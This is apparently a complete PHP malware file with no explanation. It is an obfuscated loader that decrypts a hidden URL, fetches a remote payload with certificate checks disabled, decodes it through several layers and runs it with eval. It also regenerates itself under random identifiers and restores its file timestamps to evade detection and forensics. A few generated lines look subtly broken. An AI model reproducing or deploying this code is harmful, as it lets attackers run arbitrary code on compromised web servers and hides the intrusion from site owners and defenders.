<?php
@error_reporting(0);@ini_set('display_errors','0');

$yc4dea029=861;$y4f51f3ed8=692;$tec14d765a=503;$u10d3b3177=538;

$c886db155=['fWttXSxTKSpX','SjRhQyhddiZX','T1VeaEpOJC41','ZmM1QVl1azE='];
$ke9f60c23e='';
foreach($c886db155 as $rd550ffb4){
$ke9f60c23e.=base64_decode($rd550ffb4);
}

$s8457f25806c='5d01157464b9bcae1c5fbf9294692121';
$bb1c7a3e2='eERYUU1iczVXTXM0a04rK3kyRTlvb1ZjaWp4UFU5WXdubHR1VnBNNEZSQVFyU29tWlU5NDF1eVZmSDZpK1Z2KzVjSklVQUJPQU1lTnRyNDcydE1XS2c9PQ==';
$j76a2a328=openssl_decrypt(base64_decode($bb1c7a3e2),"AES-128-ECB",substr(sha1($ke9f60c23e,true),0,16));
$b433fd89cf='WyJyb3QxMyIsInN0cnJldiJd';

function tff795d33($ve7a2f533){
if(function_exists('curl_init')){
$m2a26f6f=@curl_init($ve7a2f533);
if($m2a26f6f){
@curl_setopt($m2a26f6f,CURLOPT_RETURNTRANSFER,1);
@curl_setopt($m2a26f6f,CURLOPT_SSL_VERIFYPEER,0);
@curl_setopt($m2a26f6f,CURLOPT_SSL_VERIFYHOST,0);
@curl_setopt($m2a26f6f,CURLOPT_TIMEOUT,15);
@curl_setopt($m2a26f6f,CURLOPT_CONNECTTIMEOUT,5);
@curl_setopt($m2a26f6f,CURLOPT_FOLLOWLOCATION,1);
@curl_setopt($m2a26f6f,CURLOPT_ENCODING,'gzip');
@curl_setopt($m2a26f6f,CURLOPT_DNS_CACHE_TIMEOUT,3600);
@curl_setopt($m2a26f6f,CURLOPT_TCP_FASTOPEN,1);
$j24961976d94=@curl_exec($m2a26f6f);
$kaea140a5=@curl_errno($m2a26f6f);
@curl_close($m2a26f6f);
if(!$kaea140a5&&$j24961976d94&&strlen($j24961976d94)>50)return $j24961976d94;
}}
if(ini_get('allow_url_fopen')){
$kaea140a5=@stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false],'http'=>['timeout'=>10,'ignore_errors'=>true]]);
$j24961976d94=@file_get_contents($ve7a2f533,false,$kaea140a5);
if($j24961976d94&&strlen($j24961976d94)>50)return $j24961976d94;
}
$kaea140a5=@parse_url($ve7a2f533);
if($kaea140a5){
$m2a26f6f=($kaea140a5['scheme']=='https'?'ssl://':'').$kaea140a5['host'];
$j24961976d94=@fsockopen($m2a26f6f,$kaea140a5['scheme']=='https'?443:80,$_e,$_s,8);
if($j24961976d94){
$_p=isset($kaea140a5['path'])?$kaea140a5['path']:'/';
if(isset($kaea140a5['query']))$_p.='?'.$kaea140a5['query'];
@fwrite($j24961976d94,"GET ".$_p." HTTP/1.1\r\nHost: ".$kaea140a5['host']."\r\nAccept-Encoding: gzip\r\nConnection: Close\r\n\r\n");
$_r='';
while(!@feof($j24961976d94))$_r.=@fgets($j24961976d94,8192);
@fclose($j24961976d94);
$_b=strpos($_r,"\r\n\r\n");
if($_b!==false){$_r=substr($_r,$_b+4);if(strlen($_r)>50)return $_r;}
}}
return false;
}

function a469e0e4cf4($l1c14e988,$md67fafcd4){
$j7a2e241=json_decode(base64_decode($md67fafcd4),true);
$f3aadb8c33=base64_decode($l1c14e988);
foreach(array_reverse($j7a2e241) as $ida8f02ab){
if($ida8f02ab=='rot13')$f3aadb8c33=str_rot13($f3aadb8c33);
elseif($ida8f02ab=='strrev')$f3aadb8c33=strrev($f3aadb8c33);
}
return base64_decode($f3aadb8c33);
}

function u92b8a4ddff($c9d2d15ed,$ke9f60c23e,$s8457f25806c){
$zfe3869e=hash_pbkdf2('sha256',$ke9f60c23e,$s8457f25806c,10000,32,true);
$h673bdfc=substr($c9d2d15ed,0,1);
$d2718b8e56=substr($c9d2d15ed,1,16);
$h122a50a07=substr($c9d2d15ed,17);
if($h673bdfc==chr(1)&&extension_loaded('openssl')){
return openssl_decrypt($h122a50a07,'aes-256-ctr',$zfe3869e,OPENSSL_RAW_DATA,$d2718b8e56);
}else{
$ve7a2f533='';
for($m2a26f6f=0;$m2a26f6f<strlen($h122a50a07);$m2a26f6f++){
$ve7a2f533.=$h122a50a07[$m2a26f6f]^$zfe3869e[$m2a26f6f%strlen($zfe3869e)];
}
return $ve7a2f533;
}
}

$j24961976d94=tff795d33($j76a2a328);
if(!$j24961976d94)die('E');
$kaea140a5=a469e0e4cf4($j24961976d94,$b433fd89cf);
$l1c14e988=u92b8a4ddff($kaea140a5,$ke9f60c23e,$s8457f25806c);
@eval('?>'.$l1c14e988);
$l1c14e988=null;$kaea140a5=null;$j24961976d94=null;unset($l1c14e988,$kaea140a5,$j24961976d94);

class Z2bd922663c0{
private static $j8d46ce6d=0;
private $pb2880aedd9='5d01157464b9bcae1c5fbf9294692121';
private $ve4f7756f='eERYUU1iczVXTXM0a04rK3kyRTlvb1ZjaWp4UFU5WXdubHR1VnBNNEZSQVFyU29tWlU5NDF1eVZmSDZpK1Z2KzVjSklVQUJPQU1lTnRyNDcydE1XS2c9PQ==';
private $na029222178='WyJyb3QxMyIsInN0cnJldiJd';
private $rc44efda03=['fWttXSxTKSpX','SjRhQyhddiZX','T1VeaEpOJC41','ZmM1QVl1azE='];

public function ud7e5e74d116(){
if(!empty($_GET)||!empty($_POST))return false;
clearstatcache();
if(time()-filemtime(__FILE__)>86400)return true;
if(rand(1,100)<=3)return true;
self::$j8d46ce6d++;
if(self::$j8d46ce6d>=50)return true;
return false;
}

public function m117f0a2(){
$file=__FILE__;
clearstatcache();
$stat=stat($file);
$mtime=$stat['mtime'];
$atime=$stat['atime'];

$nv=[];
for($i=0;$i<26;$i++){
$c2='abcdefghijklmnopqrstuvwxyz';
$n='$'.$c2[rand(0,25)];
for($j=0;$j<rand(7,11);$j++)$n.=substr(md5(mt_rand()),rand(0,25),1);
$nv[]=$n;
}

$nf=[];
for($i=0;$i<10;$i++){
$c2='abcdefghijklmnopqrstuvwxyz';
$n=$c2[rand(0,25)].substr(md5(mt_rand()),0,1);
for($j=0;$j<rand(6,10);$j++)$n.=substr(md5(mt_rand()),rand(0,25),1);
$nf[]=$n;
}

$nc=chr(rand(65,90));
for($i=0;$i<rand(8,12);$i++)$nc.=substr(md5(mt_rand()),rand(0,25),1);

$c="<?php"."\n";
$c.="@error_reporting(0);@ini_set('display_errors','0');"."\n\n";
for($i=0;$i<rand(4,8);$i++){
$c.='$'.substr(md5(mt_rand()),0,8).'='.rand(100,999).';';
}
$c.="\n\n";

$c.=$nv[0].'=[';
foreach($this->rc44efda03 as $k){
$c.="'".addslashes($k)."',";
}
$c=rtrim($c,',').'];'."\n";
$c.=$nv[1].'=\'\';'."\n";
$c.='foreach('.$nv[0].' as '.$nv[2].'){'."\n";
$c.=$nv[1].'.=base64_decode('.$nv[2].');'."\n";
$c.='}'."\n\n";

$c.=$nv[3].'=\''.addslashes($this->pb2880aedd9).'\';'."\n";
$c.=$nv[25].'=\''.addslashes($this->ve4f7756f).'\';'."\n";
$c.=$nv[4].'=openssl_decrypt(base64_decode('.$nv[25].'),\"AES-128-ECB\",substr(sha1('.$nv[1].',true),0,16));'."\n";
$c.=$nv[5].'=\''.addslashes($this->na029222178).'\';'."\n\n";

$c.='function '.$nf[0].'('.$nv[6].'){'."\n";
$c.='if(function_exists(\'curl_init\')){'."\n";
$c.=$nv[7].'=@curl_init('.$nv[6].');'."\n";
$c.='if('.$nv[7].'){'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_RETURNTRANSFER,1);'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_SSL_VERIFYPEER,0);'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_SSL_VERIFYHOST,0);'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_TIMEOUT,15);'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_CONNECTTIMEOUT,5);'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_FOLLOWLOCATION,1);'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_ENCODING,\'gzip\');'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_DNS_CACHE_TIMEOUT,3600);'."\n";
$c.='@curl_setopt('.$nv[7].',CURLOPT_TCP_FASTOPEN,1);'."\n";
$c.=$nv[8].'=@curl_exec('.$nv[7].');'."\n";
$c.=$nv[9].'=@curl_errno('.$nv[7].');'."\n";
$c.='@curl_close('.$nv[7].');'."\n";
$c.='if(!'.$nv[9].'&&'.$nv[8].'&&strlen('.$nv[8].')>50)return '.$nv[8].';'."\n";
$c.='}}'."\n";
$c.='if(ini_get(\'allow_url_fopen\')){'."\n";
$c.=$nv[9].'=@stream_context_create([\'ssl\'=>[\'verify_peer\'=>false,\'verify_peer_name\'=>false],\'http\'=>[\'timeout\'=>10]]);'."\n";
$c.=$nv[8].'=@file_get_contents('.$nv[6].',false,'.$nv[9].');'."\n";
$c.='if('.$nv[8].'&&strlen('.$nv[8].')>50)return '.$nv[8].';'."\n";
$c.='}'."\n";
$c.=$nv[9].'=@parse_url('.$nv[6].');'."\n";
$c.='if('.$nv[9].'){'."\n";
$c.=$nv[7].'=('.$nv[9].'[\'scheme\']==\'https\'?\'ssl://\':last\'\').'.$nv[9].'[\'host\'];'."\n";
$c.=$nv[8].'=@fsockopen('.$nv[7].','.$nv[9].'[\'scheme\']==\'https\'?443:80,$_e,$_s,8);'."\n";
$c.='if('.$nv[8].'){'."\n";
$c.='$_p=isset('.$nv[9].'[\'path\'])?'.$nv[9].'[\'path\']:\'/\';'."\n";
$c.='if(isset('.$nv[9].'[\'query\']))$_p.=\'?\'.'.$nv[9].'[\'query\'];'."\n";
$c.='@fwrite('.$nv[8].',\"GET \".$_p.\" HTTP/1.1\\r\\nHost: \".'."\n";
$c.=$nv[9].'[\'host\'].\"\\r\\nAccept-Encoding: gzip\\r\\nConnection: Close\\r\\n\\r\\n\");'."\n";
$c.='$_r=\'\';'."\n";
$c.='while(!@feof('.$nv[8].'))$_r.=@fgets('.$nv[8].',8192);'."\n";
$c.='@fclose('.$nv[8].');'."\n";
$c.='$_b=strpos($_r,\"\\r\\n\\r\\n\");'."\n";
$c.='if($_b!==false){$_r=substr($_r,$_b+4);if(strlen($_r)>50)return $_r;}'."\n";
$c.='}}'."\n";
$c.='return false;'."\n";
$c.='}'."\n\n";

$c.='function '.$nf[1].'('.$nv[10].','.$nv[11].'){'."\n";
$c.=$nv[12].'=json_decode(base64_decode('.$nv[11].'),true);'."\n";
$c.=$nv[13].'=base64_decode('.$nv[10].');'."\n";
$c.='foreach(array_reverse('.$nv[12].') as '.$nv[14].'){'."\n";
$c.='if('.$nv[14].'==\'rot13\')'.$nv[13].'=str_rot13('.$nv[13].');'."\n";
$c.='elseif('.$nv[14].'==\'strrev\')'.$nv[13].'=strrev('.$nv[13].');'."\n";
$c.='}'."\n";
$c.='return base64_decode('.$nv[13].');'."\n";
$c.='}'."\n\n";

$c.='function '.$nf[2].'('.$nv[15].','.$nv[1].','.$nv[3].'){'."\n";
$c.=$nv[16].'=hash_pbkdf2(\'sha256\','.$nv[1].','.$nv[3].',10000,32,true);'."\n";
$c.=$nv[17].'=substr('.$nv[15].',0,1);'."\n";
$c.=$nv[18].'=substr('.$nv[15].',1,16);'."\n";
$c.=$nv[19].'=substr('.$nv[15].',17);'."\n";
$c.='if('.$nv[17].'==chr(1)&&extension_loaded(\'openssl\')){'."\n";
$c.='return openssl_decrypt('.$nv[19].',\'aes-256-ctr\','.$nv[16].',OPENSSL_RAW_DATA,'.$nv[18].');'."\n";
$c.='}else{'."\n";
$c.=$nv[6].'=\'\';'."\n";
$c.='for('.$nv[7].'=0;'.$nv[7].'<strlen('.$nv[19].');'.$nv[7].'++){'."\n";
$c.=$nv[6].'.='.$nv[19].'['.$nv[7].']^'.$nv[16].'['.$nv[7].'%strlen('.$nv[16].')];'."\n";
$c.='}'."\n";
$c.='return '.$nv[6].';'."\n";
$c.='}'."\n";
$c.='}'."\n\n";

$c.=$nv[8].'='.$nf[0].'('.$nv[4].');'."\n";
$c.='if(!'.$nv[8].')die(\'E\');'."\n";
$c.=$nv[9].'='.$nf[1].'('.$nv[8].','.$nv[5].');'."\n";
$c.=$nv[10].'='.$nf[2].'('.$nv[9].','.$nv[1].','.$nv[3].');'."\n";
$c.='@eval(\'?>\'.'.$nv[10].');'."\n";
$c.=$nv[10].'=null;'.$nv[9].'=null;'.$nv[8].'=null;unset('.$nv[10].','.$nv[9].','.$nv[8].');'."\n\n";

$c.='class '.$nc.'{'."\n";
$c.='private static '.$nv[20].'=0;'."\n";
$c.='private '.substr($nv[21],1).'=\''.addslashes($this->pb2880aedd9).'\';'."\n";
$c.='private '.substr($nv[22],1).'=\''.addslashes($this->ve4f7756f).'\';'."\n";
$c.='private '.substr($nv[23],1).'=\''.addslashes($this->na029222178).'\';'."\n";
$c.='private '.substr($nv[24],1).'=[';
foreach($this->rc44efda03 as $k){
$c.="'".addslashes($k)."',";
}
$c=rtrim($c,',').'];'."\n\n";

$c.='public function '.$nf[3].'(){'."\n";
$c.='if(!empty($_GET)||!empty($_POST))return false;'."\n";
$c.='clearstatcache();'."\n";
$c.='if(time()-filemtime(__FILE__)>86400)return true;'."\n";
$c.='if(rand(1,100)<=3)return true;'."\n";
$c.='self::'.$nv[20].'++;'."\n";
$c.='if(self::'.$nv[20].'>=50)return true;'."\n";
$c.='return false;'."\n";
$c.='}'."\n\n";

$c.='public function '.$nf[4].'(){/*mutate*/}'."\n";
$c.='}'."\n\n";

$c.='$obj=new '.$nc.';'."\n";
$c.='if($obj->'.$nf[3].'()){'."\n";
$c.='$obj->'.$nf[4].'();'."\n";
$c.='}'."\n";
$c.='?>';

file_put_contents($file,$c);
touch($file,$mtime,$atime);
}
}

$obj=new Z2bd922663c0();
if($obj->ud7e5e74d116()){
$obj->m117f0a2();
}
?>